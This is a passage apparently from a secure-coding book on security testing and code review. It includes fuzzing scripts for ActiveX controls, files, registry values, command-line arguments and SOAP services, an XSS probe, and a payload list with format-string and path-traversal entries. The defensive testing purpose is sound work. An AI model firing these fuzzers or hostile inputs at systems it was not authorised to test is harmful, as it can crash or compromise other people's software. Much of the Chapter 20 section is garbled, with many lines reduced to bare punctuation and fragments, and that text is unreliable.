An ActiveX control that is marked safe for scripting or safe for initialization can be instantiated by any Web page, so it must treat every property value and method argument as hostile. Does your control survive arbitrary input from a page it has never seen? The simplest harness is an HTML page that instantiates the control with an <OBJECT> tag and sets its properties through <PARAM> tags inside the <OBJECT> element; edit the values, load the page, watch the control. The example below loads the System Monitor control, Sysmon.ocx (CLASSID C4D2D8E0-D1DD-11CE-940F-008029004347), leaves most properties at typical values, and sets LogFileName to a string of 2,000 characters.
<HTML>
<BODY>
<OBJECT ID="DISysMon" WIDTH="100%" HEIGHT="100%"
        CLASSID="CLSID:C4D2D8E0-D1DD-11CE-940F-008029004347">
<PARAM NAME="_Version" VALUE="195000">
<PARAM NAME="_ExtentX" VALUE="21000">
<PARAM NAME="_ExtentY" VALUE="16000">
<PARAM NAME="AmbientFont" VALUE="1">
<PARAM NAME="Appearance" VALUE="0">
<PARAM NAME="BackColor" VALUE="0">
<PARAM NAME="BackColorCtl" VALUE="-2147483633">
<PARAM NAME="BorderStyle" VALUE="1">
<PARAM NAME="CounterCount" VALUE="0">
<PARAM NAME="DisplayType" VALUE="3">
<PARAM NAME="ForeColor" VALUE="-1">
<PARAM NAME="GraphTitle" VALUE="Test">
<PARAM NAME="GridColor" VALUE="8421504">
<PARAM NAME="Highlight" VALUE="0">
<PARAM NAME="LegendColumnWidths"
       VALUE="-11 -12 -14 -12 -13 -13 -16">
<PARAM NAME="LegendSortColumn" VALUE="0">
<PARAM NAME="LegendSortDirection" VALUE="2097272">
<PARAM NAME="LogFileName" VALUE="aaaaaa...aaaaaaa">  <!-- 2,000 'a' characters -->
<PARAM NAME="LogViewStart" VALUE="">
<PARAM NAME="LogViewStop" VALUE="">
<PARAM NAME="ManualUpdate" VALUE="0">
<PARAM NAME="MaximumSamples" VALUE="100">
<PARAM NAME="MaximumScale" VALUE="100">
<PARAM NAME="MinimumScale" VALUE="0">
<PARAM NAME="MonitorDuplicateInstances" VALUE="1">
<PARAM NAME="ReadOnly" VALUE="0">
<PARAM NAME="ReportValueType" VALUE="4">
<PARAM NAME="SampleCount" VALUE="0">
<PARAM NAME="ShowHorizontalGrid" VALUE="1">
<PARAM NAME="ShowLegend" VALUE="1">
<PARAM NAME="ShowScaleLabels" VALUE="1">
<PARAM NAME="ShowToolbar" VALUE="1">
<PARAM NAME="ShowValueBar" VALUE="1">
<PARAM NAME="ShowVerticalGrid" VALUE="1">
<PARAM NAME="TimeBarColor" VALUE="255">
<PARAM NAME="UpdateInterval" VALUE="1">
<PARAM NAME="YAxisLabel" VALUE="Test">
</OBJECT>
</BODY>
</HTML>
Editing the <PARAM NAME> values by hand does not scale, so generate the HTML instead. The following C# program writes a test page that sets a selection of the control's numeric properties to random integers and its string properties to strings of random length; load the resulting HTML in the browser to exercise the control, and change the seed or the property lists between runs.
using System;
using System.Text;
using System.IO;

namespace WhackObject {
    class Class1 {
        static Random _rand;

        // A random integer, including negative and out-of-range values.
        static int getNum() {
            return _rand.Next(-1000, 1000);
        }

        // A string of 'A's of random length, up to 16,000 characters.
        static string getString() {
            int length = _rand.Next(1, 16000);
            StringBuilder s = new StringBuilder(length);
            for (int i = 0; i < length; i++)
                s.Append("A");
            return s.ToString();
        }

        static void Main(string[] args) {
            _rand = new Random(unchecked((int)DateTime.Now.Ticks));
            string CRLF = "\r\n";
            try {
                string htmlFile = "test.html";
                string prolog =
                    @"<HTML><BODY><OBJECT ID='DISysMon' WIDTH='100%' HEIGHT='100%' " +
                    "CLASSID='CLSID:C4D2D8E0-D1DD-11CE-940F-008029004347'>";
                string epilog = @"</OBJECT></BODY></HTML>";
                StreamWriter sw = new StreamWriter(htmlFile);
                sw.Write(prolog + CRLF);

                // Properties to exercise: numeric ones get random integers,
                // string ones get strings of random length.
                string[] numericArgs = {
                    "ForeColor", "SampleCount",
                    "TimeBarColor", "ReadOnly"};
                string[] stringArgs = {
                    "LogFileName", "YAxisLabel", "XAxisLabel"};
                for (int i = 0; i < numericArgs.Length; i++)
                    sw.Write(@"<PARAM NAME='{0}' VALUE='{1}'>{2}",
                             numericArgs[i], getNum(), CRLF);
                for (int j = 0; j < stringArgs.Length; j++)
                    sw.Write(@"<PARAM NAME='{0}' VALUE='{1}'>{2}",
                             stringArgs[j], getString(), CRLF);
                sw.Write(epilog + CRLF);
                sw.Flush();
                sw.Close();
            } catch (IOException e) {
                Console.Write(e.ToString());
            }
        }
    }
}
Make the generated values cover each class of malformed data in Table 19-1, not only long strings: empty values, out-of-range numbers and values with embedded quotes and angle brackets all belong in the <PARAM> tags. The page is loaded in Microsoft Internet Explorer, which hosts the control; it is the control, not the browser, whose behaviour you are watching.

Testing file input

If your application reads files, first check that the ACLs on those files are right (an attacker who can write the file does not need a parser bug), and then feed it malformed files. The Perl script below writes file.txt with 0 to 32,000 'A' characters and runs program.exe on each version:
use strict;
use warnings;

my $FILE  = "file.txt";
my $exe   = "program.exe";
my @sizes = (0, 256, 512, 1024, 2048, 32000);

foreach (@sizes) {
    print "Trying $_ bytes\n";
    open FILE, "> $FILE" or die "$!\n";
    print FILE 'A' x $_;
    close FILE;
    # Run the application on the file; $? >> 8 is its exit status.
    system("$exe $FILE");
    print "exit status ", $? >> 8, "\n";
}
To find out which files an application actually touches, watch it with FileMon (http://www.sysinternals.com). Two tools that inject faults at the file and API level, Holodeck and Canned Heat, come from the Center for Software Engineering Research at the Florida Institute of Technology (http://se.fit.edu/projects); see also James A. Whittaker's How to Break Software: A Practical Guide to Testing (listed in the bibliography).

Testing registry input

Perl's Win32::Registry module can write arbitrary data to the keys your application reads. Registry data deserves the same suspicion as a file: anyone who can write the key controls the value. The script below writes a 1,000-character string value and then runs the application that reads it.
use strict;
use warnings;
use Win32::Registry;

my $reg;
$::HKEY_LOCAL_MACHINE->Create("SOFTWARE\\AdvWorks\\1.0\\Config", $reg)
    or die "$^E";
my $type  = 1;           # REG_SZ
my $value = 'A' x 1000;  # a 1,000-character string
$reg->SetValueEx("SomeData", "", $type, $value);
$reg->Close();

# Now run the application that reads the value.
system('process.exe');
The same can be done from VBScript; Perl is used here only because the rest of the examples are in Perl.

Testing command-line arguments

Launch the application from a script with each combination of arguments and look at how it exits. After a system() call in Perl, $? holds the wait status; $? >> 8 is the exit status the process returned, and a crash shows up as an unexpected value. The script below (see Secureco2\Chapter19) picks, on every iteration, a random number of arguments of three types (path, numeric and alphanumeric), builds a command line from them, and runs the program.
# ExerciseArgs.pl
# Call an application with random combinations of arguments.
use strict;
use warnings;

my $exe = "process.exe";
my $iterations = 100;

# Argument types.
my $NUMERIC  = 0;
my $ALPHANUM = 1;
my $PATH     = 2;

# The options the application accepts:
# /p takes a path, /i a number, /n an alphanumeric string.
my %opts = (
    p => $PATH,
    i => $NUMERIC,
    n => $ALPHANUM);
my @opts2 = keys %opts;

# Main test loop.
for (my $i = 0; $i < $iterations; $i++) {
    print "Iteration $i";

    # How many arguments this time?
    my $numargs = 1 + int rand scalar @opts2;
    print " ($numargs args) ";

    # Build the argument string.
    my $args = "";
    for (my $j = 0; $j < $numargs; $j++) {
        my $whicharg = $opts2[int rand scalar @opts2];
        my $type = $opts{$whicharg};
        my $arg = "";
        # The rest of the loop body is missing from the page; the value
        # generation below is a minimal completion, one case per type.
        if ($type == $NUMERIC) {
            $arg = int rand 2**32;
        } elsif ($type == $ALPHANUM) {
            $arg = 'A' x (1 + int rand 4096);
        } else {
            $arg = 'C:\\' . ('a' x (1 + int rand 260));
        }
        $args .= " /$whicharg $arg";
    }
    print "$args\n";

    # Run the application and report its exit status.
    system("$exe $args");
    printf "exit status %d\n", $? >> 8;
}
Command-line parsing matters most in programs that run with privilege, because an argument is the easiest input for a local user to control. A buffer overrun in the setuid root whodo utility shipped with Solaris 2.5, 2.6, 7 and 8 from Sun Microsystems let any local user gain root (http://www.securityfocus.com/bid/2935).
Testing XML payloads

If your application consumes XML, the malformed-data classes of Table 19-1 apply twice: to the element and attribute values, and to the XML structure itself. Test unclosed and deeply nested elements, enormous attribute values, invalid characters and missing or duplicated required elements, not just bad values in well-formed documents. You can generate the test documents with Perl, with the .NET Framework, or with the Microsoft XML DOM (XML Document Object Model). The sample in Secureco2\Chapter19 builds the XML from JScript in an HTML page; the approach is the same as for the generated HTML above, with XML as the output.
Do not assume the parser is someone else's problem: the application decides what it does with a document that is well formed but far larger or deeper than expected, and XML handling has failed in the field for exactly that reason; one such case is described at http://www.computerworld.com/rckey259/story/0,1199,NAV63_STO61979,00.html.
Testing SOAP services

SOAP is XML carried over HTTP, so everything said above about malformed XML and malformed HTTP applies to a SOAP service as well, and it can be attacked at either layer. The Perl script below (see Secureco2\Chapter19) sends SOAP envelopes with random SOAPAction headers and random amounts of white space and line breaks inside the body. SOAP can also be carried over SMTP, but HTTP is by far the most common transport and is what the script targets.
# TestSoap.pl
use strict;
use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

my $ua = LWP::UserAgent->new();
$ua->agent("SOAPWhack/1.0");
my $url = 'http://localhost/MySOAPHandler.dll';
my $iterations = 10;

# Used by coinToss().
my $HEADS = 0;
my $TAILS = 1;

open LOGFILE, ">>SOAPWhack.log" or die $!;

# Possible SOAPAction values: empty, random junk, or a plausible name.
my @soapActions = ('', 'junk', 'foo.sdl');

for (my $i = 1; $i <= $iterations; $i++) {
    print "SOAPWhack: $i of $iterations\r";

    # Pick a SOAPAction; 'junk' becomes up to 255 'S' characters.
    my $soapAction = $soapActions[int rand scalar @soapActions];
    $soapAction = 'S' x int rand 256 if $soapAction eq 'junk';

    my $soapNamespace  = "http://schemas.xmlsoap.org/soap/envelope/";
    my $schemaInstance = "http://www.w3.org/2001/XMLSchema-instance";
    my $xsd            = "http://www.w3.org/XMLSchema";
    my $soapEncoding   = "http://schemas.xmlsoap.org/soap/encoding/";

    # Sometimes a single space or newline, sometimes thousands of them.
    my $spaces = coinToss() == $HEADS ? ' '  : ' '  x int rand 16384;
    my $crlf   = coinToss() == $HEADS ? "\n" : "\n" x int rand 256;

    # Build the SOAP request.
    my $soapRequest = POST $url;
    $soapRequest->push_header("SOAPAction" => $soapAction);
    $soapRequest->content_type('text/xml');
    $soapRequest->content("<soap:Envelope " . $spaces .
        " xmlns:soap=\"" . $soapNamespace .
        "\" xmlns:xsi=\"" . $schemaInstance .
        "\" xmlns:xsd=\"" . $xsd .
        "\" xmlns:soapenc=\"" . $soapEncoding .
        "\"><soap:Body>" . $crlf .
        "</soap:Body></soap:Envelope>");

    # Send it.
    my $soapResponse = $ua->request($soapRequest);

    # Log the request and the response.
    print LOGFILE "[SOAP Request]";
    print LOGFILE $soapRequest->as_string . "\n";
    print LOGFILE "[SOAP Response]";
    print LOGFILE $soapResponse->status_line . " ";
    print LOGFILE $soapResponse->as_string . "\n";
}
close LOGFILE;

sub coinToss {
    return rand 10 > 5 ? $HEADS : $TAILS;
}
Read the log afterwards rather than the console: the interesting cases are the ones where the status line or the response body changes shape. A C# version of the same test can be built on the SoapHttpClientProtocol class in the .NET Framework.
Testing for cross-site scripting

Chapter 13 describes cross-site scripting (XSS): a Web application echoes untrusted input back to the browser without encoding it, so an attacker can run script in a victim's browser in the context of your site and, for instance, read the user's cookies or rewrite the page. The attack is against your users rather than your server, which is why it is easy to overlook; see http://www.owasp.org for more on the class. Chapter 13 gives the fix (encode output); the test is simple. Send input containing characters that are significant in HTML, such as <>>, to every form field and query-string parameter, and look for the same characters, unencoded, in the response. Anything echoed raw is a candidate; anything echoed as &lt; and &gt; has been handled. The Perl script below first sends a harmless marker (xyzzy) to find out whether the parameter is echoed at all; if it is, it sends the HTML characters and reports a likely XSS bug if they come back unescaped. This is a screening test: a clean result does not prove the absence of XSS, since the parameter may be echoed on another page or under other conditions.
# CSSInject.pl
use strict;
use warnings;
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

my $url = "http://127.0.0.1/test.asp";

# First probe: a harmless marker. Is the input echoed back at all?
my $css = "xyzzy";
$_ = buildAndSendRequest($url, $css);
if (index(lc $_, lc $css) != -1) {
    print "Possible XSS issue in $url\n";

    # Second probe: characters that are significant in HTML.
    $css = "<>>";
    $_ = buildAndSendRequest($url, $css);
    if (index(lc $_, lc $css) != -1) {
        print "Very likely an XSS issue in $url\n";
    } else {
        print "Input is echoed, but the HTML characters were encoded or removed\n";
    }
}

# The body of this subroutine is missing from the page; this minimal
# completion POSTs the probe in a form field named Name and returns
# the complete response as a string.
sub buildAndSendRequest {
    my ($url, $payload) = @_;
    my $ua  = LWP::UserAgent->new();
    my $req = POST $url, [Name => $payload];
    my $res = $ua->request($req);
    return $res->as_string;
}
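The Perl script asks only whether the probe appears in the response. The following Python function, added here as an example and not code from the book, refines that into three answers (raw, encoded, absent), so a tester can tell a real XSS candidate from a correctly encoded echo and say where in the page the raw echo landed. The function names and the sample responses are this example's own; the responses are constructed to stand in for what test.asp might return.

```python
"""Classify how a test string is echoed in an HTTP response body.

Added example (not code from the book): the Perl script above only asks
whether the probe appears in the response. This refines that into three
answers, so a tester can separate a real XSS candidate from a correctly
encoded echo and report where the raw echo occurs. Function names are
this example's own; the sample responses are constructed.
"""
import html
import re
from typing import Dict, List

# A probe containing the characters that matter in HTML, plus a marker word.
PROBE = 'xyzzy"<>'


def classify_reflection(body: str, probe: str = PROBE) -> str:
    """Return 'raw', 'encoded' or 'absent' for one response body.

    raw     - the probe appears verbatim, HTML-significant characters intact:
              the XSS case the Perl script reports;
    encoded - the probe text appears only with its <, > and " turned into
              entities, which is what correct output encoding looks like;
    absent  - the probe text is not in the response at all.
    Comparisons are case-insensitive, like the Perl script's.
    """
    needle = probe.lower()
    if needle in body.lower():
        return "raw"
    # html.unescape handles both named (&lt;) and numeric (&#60;) entities.
    if needle in html.unescape(body).lower():
        return "encoded"
    return "absent"


def raw_contexts(body: str, probe: str = PROBE, width: int = 24) -> List[str]:
    """Snippets around each raw echo, so the bug report can say which tag or attribute it hit."""
    return [body[max(0, m.start() - width):m.end() + width]
            for m in re.finditer(re.escape(probe), body, re.IGNORECASE)]


# Constructed responses standing in for what test.asp might return.
SAMPLE_RESPONSES: Dict[str, str] = {
    "echo in text":      '<p>Hello xyzzy"<>, welcome back</p>',
    "echo in attribute": '<input name="q" value="xyzzy"<>">',
    "encoded correctly": '<p>Hello xyzzy&quot;&lt;&gt;, welcome back</p>',
    "numeric entities":  '<p>xyzzy&#34;&#60;&#62;</p>',
    "not echoed":        '<p>Thank you</p>',
}


def screen(responses: Dict[str, str]) -> Dict[str, str]:
    """Classify every response; only 'raw' results are XSS candidates."""
    return {name: classify_reflection(body) for name, body in responses.items()}


if __name__ == "__main__":
    for name, verdict in screen(SAMPLE_RESPONSES).items():
        print(f"{name:20s} {verdict}")
```

The "encoded" verdict is as useful as "raw": it tells you the parameter is echoed, so the same parameter deserves a second look in any other page or context (a JavaScript string, a URL attribute) where HTML entity encoding alone is not enough.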
Testing clients with a hostile server

Client code needs testing too, and it is usually tested less: clients tend to trust whatever the server returns. The Perl script below (see Secureco2\Chapter19) listens on port 80 and answers every connection with a random amount of random printable characters. Point the client at it and watch how it copes with junk where it expected a protocol; a client that parses the reply with fixed-size buffers or without checking lengths will show it here.
# TCPJunkServer.pl
use strict;
use warnings;
use IO::Socket;

my $port = 80;
my $server = IO::Socket::INET->new(LocalPort => $port,
                                   Type      => SOCK_STREAM,
                                   Reuse     => 1,
                                   Listen    => 100)
    or die "Cannot listen on port $port: $@\n";

while (my $client = $server->accept()) {
    my $peerip   = $client->peerhost();
    my $peerport = $client->peerport();

    # Up to 16 KB of random printable characters.
    my $size  = int rand 16384;
    my @chars = ('A'..'Z', 'a'..'z', 0..9,
                 qw( ! @ # $ % ^ & * - + = ));
    my $junk  = join("", @chars[map { rand @chars } (1 .. $size)]);

    print "Connection from $peerip:$peerport, ";
    print "sending $size bytes of junk.\n";
    $client->send($junk);
    close($client);
}
close($server);
Testing with different privilege levels

Does your application really work when run as a non-administrator? If every tester is an administrator, two kinds of bug stay hidden: code that fails silently without privilege, and code that is only safe because the person running it had privilege. Use RunAs (or simply log on as an ordinary user) and run the tests again; the failures you find are often the places where the application assumed it could write somewhere it should not be able to. Two Microsoft security bulletins show what happens when this is skipped: Available for Registry Permissions Vulnerability (http://www.microsoft.com/technet/security/bulletin/MS00095.asp) and Offload ModExpo Registry Permissions Vulnerability (http://www.microsoft.com/technet/security/bulletin/MS00024.asp). In both, registry data used by privileged code was writable by ordinary users, and no one noticed because no one had tested as one.

Also test against a hardened Windows 2000 configuration, not only a default install. Apply one of the security templates in Table 19-5 and see whether the application still works. If it does not, find out which setting it depends on and decide whether the application or the template is wrong; a product that only runs on an unhardened machine is a product that makes its customers less secure.
Table 19-5. Windows 2000 security templates

compatws: Compatible workstation. Relaxes the default file and registry ACLs for the Users group so that older applications run without making their users members of Power Users; the least restrictive template.
hisecdc: Highly secure domain controller. Tightens securedc further, including the NTFS ACLs on the domain controller.
hisecws: Highly secure workstation. Builds on securews; tightens ACLs and restricts membership of the Power Users and Terminal Server Users groups.
rootsec: Sets the default ACL on the root of the system drive (and reapplies it if it has been changed).
securedc: Secure domain controller. Tightens account policy and auditing and applies stricter NTFS and registry ACLs on a domain controller.
securews: Secure workstation. The same for workstations and member servers, with Power Users restricted.

Test against securews (or securedc for a domain controller) at minimum. If the application only works under compatws, it is relying on users having privileges they should not have.
Tracking down a bug

Suppose your application accepts an IP address, such as 172.100.84.22, and crashes when the first octet is replaced by a long string (aaaaaaaaaaaaaaaaaaaa.100.84.22). Do not stop at the first crash. Try the same substitution in each position, because each may exercise different parsing code:

aaaaaaaaaaaaaaaaaaaa.100.84.22
172.aaaaaaaaaaaaaaaaaaaa.84.22
172.100.aaaaaaaaaaaaaaaaaaaa.22
172.100.84.aaaaaaaaaaaaaaaaaaaa

Then work through the failure.

1. Decide what the failure means. A crash on malformed input is at least a denial of service. If the overlong data overwrites a return address or a function pointer, an exploit is likely; check each of the IP positions separately, since the code paths differ.
2. Where the bug looks exploitable, build a working exploit. It settles arguments about severity, and it is the surest way to verify the fix: run it again afterwards.
3. Find the root cause and fix it, then look for the same mistake elsewhere in the code. Apply the other malformed-data classes in Table 19-1 to the same input; a parser that mishandles length usually mishandles other things too.
4. Add the failing inputs to the regression test suite so the bug cannot quietly return, and make sure the test exercises the fixed code path rather than just the symptom.

Throughout, remember that the tester's job is to find the bug, not to argue that it is unreachable; if input can reach the code at all, assume an attacker will find the way.
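The four IP-address cases above are one instance of a general pattern: take a structured value, replace one field at a time, keep the others intact. The following Python module, added here as an example and not code from the book, implements that pattern for any delimiter-separated value and extends it beyond the single overlong payload to the other malformed-data classes discussed in this chapter. The function and payload names are this example's own.

```python
"""Per-field mutation of a structured input value.

Added example (not from the book): it generalizes the IP-address case
above into a function that takes any delimiter-separated value and
returns one variant per field and payload, so the same driver covers
IP addresses, dotted version numbers, paths or CSV records. The payload
list draws on the malformed-data classes discussed in this chapter; the
function and payload names are this example's own.
"""
from typing import Iterable, List

DEFAULT_PAYLOADS: List[str] = [
    "a" * 20,        # the overlong octet from the text
    "a" * 4096,      # much longer, for buffers sized "big enough"
    "",              # empty field
    "-1",            # negative where a count or octet is expected
    "256",           # one past the largest octet
    "4294967296",    # one past 32-bit unsigned
    "%s%s%n",        # format-string characters
    "../",           # path traversal
]


def mutate_fields(value: str, sep: str,
                  payloads: Iterable[str] = DEFAULT_PAYLOADS) -> List[str]:
    """Every variant of `value` in which exactly one field is replaced by a payload.

    Variants equal to the original are dropped; the order is deterministic
    (field by field, then payload by payload) so a failing case is reproducible.
    """
    fields = value.split(sep)
    variants: List[str] = []
    for index in range(len(fields)):
        for payload in payloads:
            mutated = list(fields)
            mutated[index] = payload
            candidate = sep.join(mutated)
            if candidate != value:
                variants.append(candidate)
    return variants


def ip_octet_variants(ip: str, filler: str = "a" * 20) -> List[str]:
    """The four cases from the text: one octet at a time replaced by `filler`."""
    return mutate_fields(ip, ".", [filler])


if __name__ == "__main__":
    for case in ip_octet_variants("172.100.84.22"):
        print(case)
    print(len(mutate_fields("172.100.84.22", ".")), "variants with the default payloads")
    print(mutate_fields("C:\\Program Files\\App\\app.exe", "\\", ["..", ""])[:3])
```

Feed each variant to the application under test exactly as the scripts above do for files, registry values and arguments; because the order is fixed, the index of a failing variant is enough to reproduce it.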
Measuring attack surface

Testing finds bugs, but it does not answer the question "is build A more secure than build B?" Counting bugs is misleading, because you count only what you found. A better measure is the attack surface: the set of ways an attacker can reach your code. Compute it in three steps.

1. List the attack vectors: the channels and features an attacker can reach, such as open sockets, services, accounts and weak ACLs.
2. Weight each vector by how attractive and dangerous it is.
3. Count the instances of each vector and add up the weighted counts.

The result is a relative attack surface quotient (RASQ). The vectors depend on the platform. On Windows, weak ACLs on files, registry keys and shares are a vector; on Linux and UNIX, setuid root programs are, because a bug in one hands the attacker root. Every vector you remove or disable is one the attacker cannot use, and it reduces the damage from bugs you have not found yet; this is why features should be off by default. Table 19-6 lists the vectors and weights used for Windows.
Table 19-6. Windows attack vectors and their weights

Open sockets: 1.0
Open RPC endpoints: 0.9
Open named pipes: 0.8
Services: 0.8
Services running by default: 1.0
Services running as SYSTEM: 0.9
Active Web handlers: 1.0
Active ISAPI filters: 1.0
Dynamic Web pages: 0.6
Executable virtual directories: 1.0
Enabled accounts: 0.7
Enabled accounts in the administrators group: 0.9
Null sessions to pipes and shares: 0.9
Guest account enabled: 0.9
Weak ACLs in the file system: 0.7
Weak ACLs in the registry: 0.4
Weak ACLs on shares: 0.9

Figure 19-4 applies these weights to several Windows configurations: Windows 2000, Windows .NET Server, Windows .NET Server with IIS, Windows XP, and Windows XP with the Internet Connection Firewall (ICF) enabled. (Bar chart; vertical axis 0 to 400. Figure 19-4: Relative attack surface of Windows versions.)
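As an added example, not code from the book, the following Python module turns Table 19-6 into a calculation: it sums count times weight over the Windows attack vectors and lists which vectors dominate, so the comparison "is build A more exposed than build B?" becomes a number you can track between builds. The two configurations are constructed for illustration, not measured from any real system; all names are this example's own.

```python
"""Relative attack surface quotient (RASQ) from the weights in Table 19-6.

Added example (not from the book): it sums count * weight over the
Windows attack vectors and shows which vectors dominate, so that the
comparison "is build A more exposed than build B?" becomes a number.
The two configurations below are constructed for illustration, not
measured from any real system; all names are this example's own.
"""
from typing import Dict, List, Tuple

WEIGHTS: Dict[str, float] = {
    "open sockets": 1.0,
    "open RPC endpoints": 0.9,
    "open named pipes": 0.8,
    "services": 0.8,
    "services running by default": 1.0,
    "services running as SYSTEM": 0.9,
    "active Web handlers": 1.0,
    "active ISAPI filters": 1.0,
    "dynamic Web pages": 0.6,
    "executable virtual directories": 1.0,
    "enabled accounts": 0.7,
    "enabled accounts in admin group": 0.9,
    "null sessions to pipes and shares": 0.9,
    "guest account enabled": 0.9,
    "weak ACLs in file system": 0.7,
    "weak ACLs in registry": 0.4,
    "weak ACLs on shares": 0.9,
}


def rasq(counts: Dict[str, int]) -> float:
    """Weighted sum over the vectors; a count for an unknown vector is an error, not ignored."""
    unknown = sorted(set(counts) - set(WEIGHTS))
    if unknown:
        raise ValueError(f"unknown attack vectors: {unknown}")
    if any(n < 0 for n in counts.values()):
        raise ValueError("counts must be non-negative")
    return round(sum(WEIGHTS[name] * n for name, n in counts.items()), 2)


def contributions(counts: Dict[str, int]) -> List[Tuple[str, float]]:
    """Per-vector contribution, largest first: the list to work down when cutting surface."""
    items = [(name, round(WEIGHTS[name] * n, 2)) for name, n in counts.items() if n]
    return sorted(items, key=lambda item: item[1], reverse=True)


# Constructed: a server with a default Web install, and the same box with
# the Web features, the guest account and the weak registry ACLs removed.
DEFAULT_SERVER: Dict[str, int] = {
    "open sockets": 12, "open RPC endpoints": 6, "services": 30,
    "services running by default": 25, "services running as SYSTEM": 20,
    "active Web handlers": 3, "active ISAPI filters": 2, "dynamic Web pages": 40,
    "executable virtual directories": 2, "enabled accounts": 4,
    "enabled accounts in admin group": 2, "guest account enabled": 1,
    "weak ACLs in registry": 5,
}
HARDENED_SERVER: Dict[str, int] = {
    **DEFAULT_SERVER,
    "active Web handlers": 0, "active ISAPI filters": 0, "dynamic Web pages": 0,
    "executable virtual directories": 0, "guest account enabled": 0,
    "weak ACLs in registry": 0,
}

if __name__ == "__main__":
    for label, cfg in (("default", DEFAULT_SERVER), ("hardened", HARDENED_SERVER)):
        print(f"{label}: RASQ {rasq(cfg)}")
        for name, share in contributions(cfg)[:3]:
            print(f"   {share:6.1f}  {name}")
```

The contributions list is the practical output: in the constructed default configuration, services running by default and dynamic Web pages dominate, which is exactly where the text says to cut first.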
The same method applies to other systems, such as Linux or OS/400, with their own lists of vectors. Keep its limits in mind. RASQ is relative, so compare only figures computed with the same vectors and weights, and treat small differences (on the order of 5%) as noise. It measures exposure, not the number of bugs, much as function point analysis measures the size of a program rather than its quality; and the weights are judgement calls. Use it together with the threat model: STRIDE tells you which threats apply to each vector, and the attack surface tells you how many of those vectors you have exposed. Reducing attack surface is the one defence that also covers the bugs you have not found.
Chapter 20. Performing a Security Code Review

Code review finds bugs that testing misses, in particular design and logic errors that never show up as a crash. A security code review looks for things a functional review ignores: every place untrusted data enters (a telnet session is as much an input as a file or a network packet), and every check the code assumes someone else has already made. The mechanics are those of any code inspection; Jack Ganssle's A Guide to Code Inspections (http://www.ganssle.com/Inspections.pdf) is a good description of how to run one, and of why short, focused sessions find more than long ones. A formal inspection has four roles: the moderator, who runs the meeting, the reader, who walks through the code, the recorder, who writes down the findings, and the author, who answers questions but does not defend the code. The reviewers other than the author should be people who did not write it.
.
.
, :
, , .
,
.
, .
, ,
. , ,
,
. , ,
,
. , , ,
. , :
,
.
,
. , RPC,
,
RPC. .
, .
, :
,
, . ,
, ,
, , .
, ,
API. : ,
, ,
.
,
.
? ?
?
, ,
.
. ,
, ,
, . ,
?
, ?
?
, .
. .
,
. 250 000 ,
. , ,
.
, , .
,
. , ,
.
. ,
,
,
. ,
.
,
. ,
, .
,
.
,
.
, .
, (
)
. ,
. ,
,
. ,
.
, . ,
1200 ,
, , ?
Windows Security Push 2002 ,
,
, .
: ,
.
; ,
.
Microsoft
.
: , .
.
, ,
. ,
. , ,
: ?
, .
! , ,
, : ,
,
,
.
,
. ,
, .
.
, ,
.
, , , ,
.
,
.
, .
Where to start: the dangerous functions. The string functions of Chapter 5 are the obvious case, but note that replacing strcpy with strncpy is not a fix by itself. strncpy does not NUL-terminate the destination when the source is as long as the buffer, and an off-by-one in the length argument is easy to make, so the result is a string without a terminator that the next function reads past. Treat every strncpy, strncat and snprintf call as a place to check the length argument and the termination, not as a call that is safe by construction; the reviewer's question is "what is this length, and who computed it?"
;
.
, . ,
5 ,
. ,
, ,
exploit.
, .
A related denial of service: _alloca allocates on the stack, so a size that comes from the attacker can exhaust the stack and kill the process. If you find _alloca, check that the size is bounded before the call.
Unicode and ANSI conversions are a classic source of buffer overruns. Look at every call to WideCharToMultiByte:

int WideCharToMultiByte(
    UINT    CodePage,          // code page to convert to
    DWORD   dwFlags,           // conversion flags
    LPCWSTR lpWideCharStr,     // wide-character string to convert
    int     cchWideChar,       // its length, in characters
    LPSTR   lpMultiByteStr,    // output buffer
    int     cbMultiByte,       // size of the output buffer, in bytes
    LPCSTR  lpDefaultChar,     // default for characters that cannot be mapped
    LPBOOL  lpUsedDefaultChar  // set if the default character was used
);

The input length is in characters and the output size is in bytes; MultiByteToWideChar has the mirror-image problem, since its output size is in wide characters. Passing a byte count where a character count is expected, or the reverse, is the bug to look for, and it is most common where code converts between Unicode and ANSI at a boundary, such as a DCOM or IIS interface written in C++. For each call, check that the value passed as cbMultiByte (or cchWideChar) is computed in the right unit and that the return value is checked for failure rather than used as a length.

The TCHAR type hides this. It is char or WCHAR depending on whether UNICODE is defined, so sizeof(buf) is the character count in one build and twice it in the other. Use sizeof(buf)/sizeof(buf[0]) wherever a character count is needed, and prefer explicit types at conversion points.
. ,
,
.
.
.
, .
    pUnicodeStr->MaximumLength = 0;
}
. ,
, ,
.
:
, .
,
.
, . ,
, .
,
.
Look at the assumptions behind each check. A guard such as

szDATA != NULL

means the pointer is non-NULL, not that the data is valid. A check that cbAllocSize is at least 1 does not bound it, and accepting anything from 1 to 4,000,000,000 is not a bound that protects anything; ask who chose the limit and what the code does at the edges. Then look at what happens when a call fails. strncpy (Chapter 5) gives no indication that it truncated. ImpersonateNamedPipeClient can fail, and a server that does not check is still running as itself, with all its privilege, while it does the client's work. recv returns 0 when the TCP peer has closed the connection and a negative value on error; code that treats either as "bytes received" will use a stale or uninitialized buffer. WriteFile can succeed having written fewer bytes than requested, and its byte count is a DWORD, so a 64-bit length is silently truncated before the write. For every call the question is the same: what does the code do when this fails, and is that safe?
AdjustTokenPrivileges is a well-known trap. It returns TRUE even when it could not enable every privilege requested; you must call GetLastError afterwards and distinguish ERROR_SUCCESS (everything in NewState was applied) from ERROR_NOT_ALL_ASSIGNED (some of the privileges were not held by the token and so were not enabled). Code that checks only the return value, or that ignores PreviousState and never restores it, carries on believing it has a privilege it does not have, and fails later in a way that is hard to trace. When you see the call, ask: is GetLastError checked, and is the behaviour correct when the privilege was not granted?
Finally, trust nothing that describes the size of something else. In C and C++ a structure that arrives from another process or from the network is a pattern of bytes, and the values in it are whatever the sender put there. Consider:

struct blob
{
    DWORD Size;
    BYTE* Data;
};

Here Size says how many bytes Data points to, but nothing guarantees it. Code that allocates Size bytes, or copies Size bytes out of Data, has handed control of a memory operation to whoever built the message: 4 bytes of header decide how much is read or written. The rule is to validate Size against what you actually received, and against a sane upper bound, before using it, and to treat the whole structure as untrusted until you have. Document formats such as those of Microsoft Office are full of length fields of this kind, and every one is either a check or a bug, depending on who wrote the reader. The reviewer's job is to find the places where the code believes data it has no reason to believe.
